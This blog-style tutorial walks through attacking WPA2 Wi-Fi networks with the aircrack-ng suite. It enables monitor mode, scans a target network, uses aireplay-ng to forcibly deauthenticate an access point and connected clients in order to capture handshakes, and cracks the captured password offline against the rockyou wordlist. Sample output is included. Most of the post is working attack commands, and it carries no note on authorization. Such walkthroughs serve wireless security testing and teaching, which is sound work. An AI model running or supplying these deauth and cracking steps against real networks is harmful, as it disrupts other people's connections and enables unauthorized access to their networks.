Post

Getting Started with airmon-ng

This post will show how to get started using aircrack-ng to discover wi-fi networks, capture handshakes, deauth clients, and crack passwords.

  1. Setup airmon-ng
  2. Capturing Packets
  3. Deauthing Users
  4. Crack Passwords


Setup airmon-ng

Install aircrack-ng Suite

If you’re using Kali this should come pre-installed, but if not, you can install all the required tools using:

1
sudo apt install aircrack-ng

Monitor Mode

The first step will be to enable monitor mode on our wi-fi card. Assuming our wireless network adaptor is wlan0, we put our card into monitor mode using:

1
airmon-ng start wlan0

You should now have a new wireless network adaptor that has the same name with mon appended to the end. So our adaptor will be called wlan0mon.

Additionally, you made need to kill some processes that can cause issues. This can be done using:

1
airmon-ng check kill


Capturing Packets

Basic Capture

We can begin a basic capture and log the results. This will allow us to cycle through the wifi channels and discover Access Points and Clients.

1
airodump-ng -w wifiScan1 wlan0mon
  • -w specifies the output files.
  • This ONLY listens on 2.4Ghz range.

From the above command you’ll see two separate tables. For the first table:

ColumnMeaning
BSSIDMAC address of the AP
ESSIDName of the Wi-Fi Network
BeaconsNumber of Beacon Frames received from the AP
CHThe current channel of the AP
ENC, CIPHER & AUTHEncryption & Authentication details

For the second table:

ColumnMeaning
BSSIDMAC address of the AP the client is communicating with
StationMAC address of the client
FramesData Frames received from the client
ProbesWi-Fi network the client is communicating with

Advanced Capturing

After seeing what networks are around, we can target specific channels and ESSIDs. Let’s say our target wi-fi network is TestWifi, and is using channel 4.

1
airodump-ng -a -c 4 --essid "TestWifi" -w wifiScan2 wlan0mon
  • -a only show associated clients
  • -c 4 only capture on channel 4
  • --essid "TestWifi" only show APs with the ESSID of “TestWifi”

Sample output:

1
2
3
4
5
6
7
8
9
 CH  4 ][ Elapsed: 1 min ][ 2022-02-05 12:06                                                                                                                           
                                                                                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                   
                                                                                                                                                                       
 11:22:33:44:55:66  -28 100      594      799    0   4  130   WPA2 CCMP   PSK  TestWifi                                                                                
                                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                     
                                                                                                                                                                       
 11:22:33:44:55:66  22:44:66:88:33:55  -41   12e-24     34      977         TestWifi

Because we are saving the output, there will be a capture file .cap included as part of this. However, unless a client connects while we are listening, we won’t have any handshakes recorded.

If there are already clients connected, we can attempt to forcible disconnect them and listen for the handshake when they re-connect.


Deauthing Users

While the previous command is running and we’re capturing handshakes , we can open another terminal and de-auth an AP, or a specific client connected to an AP.

Target an AP:

1
aireplay-ng -0 10 -a 11:22:33:44:55:66 wlan0mon  
  • -0 10 deauth mode and perform the deauth attack 10 times.
  • -a MAC address of the AP.

Target a Client connected to an AP:

1
aireplay-ng -0 10 -a 11:22:33:44:55:66 -c 22:44:66:88:33:55 wlan0mon  
  • -c MAC address of the client

After performing this attack, the capture should be left running for at least a few minutes to allow the clients to re-connect.


Crack Passwords

Assuming our attack was successful, we can analyse the output .cap file for handshakes and attempt to crack them offline. Let’s analyse the output file wifiScan2-01.cap from our previous capture and attempt to crack the password using the rockyou word list:

1
aircrack-ng wifiScan2-01.cap -w rockyou.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Reading packets, please wait...
Opening wifiScan2-01.cap
Read 6966 packets.

   #  BSSID              ESSID                     Encryption

   1  11:22:33:44:55:66  TestWifi                  WPA (1 handshake, with PMKID)

Choosing first network as target.

Reading packets, please wait...
Opening wifiScan2-01.cap
Read 6966 packets.

1 potential targets
  • Normally you would be ask which target you want to crack, however, since there is only 1 it will automatically selected.

The cracking will now start:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
                               Aircrack-ng 1.6

      [00:00:04] 78245/14344391 keys tested (20290.49 k/s)

      Time left: 11 minutes, 43 seconds                          0.55%

                       Current passphrase: sukiyaki


      Master Key     : 23 17 DE 4E 8C FC 74 67 82 3F 04 E9 0A 22 CE 25
                       FD 01 FA DB 29 D2 3A 2C 79 F0 7D 05 36 DA 48 1B

      Transient Key  : E9 B7 AD 37 73 E5 A5 15 24 30 7A F0 64 AF 3B 14
                       EB 68 02 69 EE D2 C4 DF 80 C6 9F E6 11 00 E2 A8
                       FF 8A 66 56 85 AE FE B3 31 06 16 AC 6B 1A E1 DA
                       AB 21 AA 22 C9 9E 42 3E 3D ED 28 C1 F7 F1 AE E3

      EAPOL HMAC     : B8 16 E5 77 E5 AB BD B6 1A 3A 69 A3 19 1C 21 C4

The above attack is running at around 20 thousand keys per second. This is running on a Intel Core i7 8700. We can improve the performance a lot by using Hashcat instead of aircrack-ng to crack the password. You can read how to do that here.

This post is licensed under CC BY 4.0 by the author.